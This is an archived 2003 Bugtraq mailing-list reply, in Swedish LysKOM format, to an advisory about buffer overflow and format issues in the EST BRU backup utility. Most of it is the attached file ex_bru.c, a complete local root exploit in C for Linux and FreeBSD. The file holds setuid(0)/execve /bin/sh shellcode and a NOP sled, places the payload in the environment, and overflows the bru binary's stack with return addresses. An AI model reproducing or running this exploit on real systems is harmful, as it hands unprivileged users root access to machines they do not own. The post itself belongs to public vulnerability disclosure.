linux, säkerhet

107950 2003-07-18  23:28  /11 rader/ Knud Erik Højgaard <kain@ircop.dk>
Importerad: 2003-07-18  23:28  av Brevbäraren
Extern mottagare: KF <dotslash@snosoft.com>
Extern mottagare: bugtraq <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <5644>
Kommentar till text 107901 av KF <dotslash@snosoft.com>
Ärende: Re: SRT2003-07-16-0358 - bru has buffer overflow and format issues
------------------------------------------------------------
KF wrote:
[snip]
>> High Level Description : bru has buffer overflow and format issues
[snip]

contact sales@snosoft.com for format-edition, free
buffer-linux/freebsd edition attached.

--
kokanin
(107950) /Knud Erik Højgaard <kain@ircop.dk>/(Ombruten)
Bilaga (application/octet-stream) i text 107951
107951 2003-07-18  23:28  /92 rader/ Knud Erik Højgaard <kain@ircop.dk>
Bilagans filnamn: "ex_bru.c"
Importerad: 2003-07-18  23:28  av Brevbäraren
Extern mottagare: KF <dotslash@snosoft.com>
Extern mottagare: bugtraq <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <5645>
Bilaga (text/plain) till text 107950
Ärende: Bilaga (ex_bru.c) till: Re: SRT2003-07-16-0358 - bru has buffer overflow and format issues
------------------------------------------------------------
/** EST BRU(TM) Backup and Restore Utility Local Root Exploit
 **
 ** By: Dvdman@l33tsecurity.com
 **
 ** Simple Stack overflow Wont say any more :P
 **
 ** Linux & FreeBsd Targets
 **
 ** Greetz: sam,flatline,v0id,#!l33tsecurity@efnet,KF,b0iler,schlumpf,kokanin,DSR
 **
 ** Public Release 
 ** L33tsecurity 2003; irc.secsup.org #l33tsecurity 
 **/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/errno.h>

#define FUN "./bru"

char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    /* SETUID(0) SHELLCODE LINUX */
    "\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc"
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"
    "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

unsigned long sp(void) {
           __asm__("movl %esp,%eax");
}

int main(int argc, char **argv) {

    char buffer[9000];
    int x,target;    
    char    *env[2];
    char    *args[24];
         
    unsigned long ret = 0xbffffffa - strlen(shellcode) - strlen(FUN);

    int *ptr = (int *)(buffer);
    if (argc != 2) {  
       usage();
       exit(0);
       }

    target = atoi(argv[1]);
   
   if (target == 0) {
    for (x=0; x<9000 ; x+=4)
      *ptr++ = (ret + 1);
   }

   if (target == 1) {
     for (x=0; x<3500 ; x+=4)
          *ptr++ = 0xbfbffe48;          
   } 

    /* put in env */
    env[0] = shellcode;
    env[1] = NULL;


    args[0] = FUN;
    args[1] = buffer;
    args[2] = NULL;
 

    execve (args[0], args, env);
    perror ("execve");
}


int usage() {
printf("EST BRU(TM)local root exploit\n");
printf("By: Dvdman@l33tsecurity.com\n");
printf("Usage: ./ex_bru target\n");
printf("TARGET LIST:\n");
printf("0. LINUX\n1. FREEBSD\n");
return 0;
}
(107951) /Knud Erik Højgaard <kain@ircop.dk>/-------